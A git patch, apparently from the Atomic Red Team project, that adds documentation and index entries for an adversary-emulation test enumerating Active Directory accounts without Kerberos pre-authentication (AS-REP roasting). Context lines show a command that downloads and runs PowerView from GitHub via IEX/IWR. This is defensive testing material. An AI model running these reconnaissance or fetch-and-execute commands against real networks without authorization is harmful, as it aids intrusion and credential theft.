From ded0f5bc5360ac2ac70de44fa1dc1ce5c85cb0fd Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 25 Jun 2020 20:36:36 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 14 ++++++++++ atomics/T1069.002/T1069.002.md | 27 +++++++++++++++++++ atomics/T1069.002/T1069.002.yaml | 1 + atomics/used_guids.txt | 1 + 8 files changed, 47 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 37da24fb..1f39e3a9 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -426,6 +426,7 @@ discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group ( discovery,T1069.002,Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell +discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index e950e61f..f378db34 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -260,6 +260,7 @@ discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group ( discovery,T1069.002,Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell +discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index da4f2b1f..6680fa95 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -826,6 +826,7 @@ - Atomic Test #4: Find machines where user has local admin access (PowerView) [windows] - Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows] - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows] + - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows] - [T1482 Domain Trust Discovery](../../T1482/T1482.md) - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows] - Atomic Test #2: Windows - Discover domain trusts with nltest [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index bde7b583..210cb204 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -536,6 +536,7 @@ - Atomic Test #4: Find machines where user has local admin access (PowerView) [windows] - Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows] - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows] + - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows] - [T1482 Domain Trust Discovery](../../T1482/T1482.md) - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows] - Atomic Test #2: Windows - Discover domain trusts with nltest [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index f9e291fe..aebb6460 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -35455,6 +35455,20 @@ discovery: command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose' name: powershell + - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast) + auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b + description: | + When successful, accounts that do not require kerberos pre-auth will be returned + Requires the Active Directory module for powershell to be installed + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth + -eq $TRUE} + +' T1482: technique: id: attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0 diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index adbb6d6d..51805ac3 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -18,6 +18,8 @@ Commands such as net group /domain of the [Net](https://attack.mitr - [Atomic Test #6 - Find Local Admins via Group Policy (PowerView)](#atomic-test-6---find-local-admins-via-group-policy-powerview) +- [Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)](#atomic-test-7---enumerate-users-not-requiring-pre-auth-asreproast) +
@@ -180,4 +182,29 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29 +
+
+ +## Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast) +When successful, accounts that do not require kerberos pre-auth will be returned +Requires the Active Directory module for powershell to be installed + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} +``` + + + + + +
diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml index ac73862b..1e5db992 100644 --- a/atomics/T1069.002/T1069.002.yaml +++ b/atomics/T1069.002/T1069.002.yaml @@ -79,6 +79,7 @@ atomic_tests: command: "IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose" name: powershell - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast) + auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b description: | When successful, accounts that do not require kerberos pre-auth will be returned Requires the Active Directory module for powershell to be installed diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 492443e9..ead9488b 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -531,3 +531,4 @@ ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b 161dcd85-d014-4f5e-900c-d3eaae82a0f7 648d68c1-8bcd-4486-9abe-71c6655b6a2c 784e4011-bd1a-4ecd-a63a-8feb278512e6 +870ba71e-6858-4f6d-895c-bb6237f6121b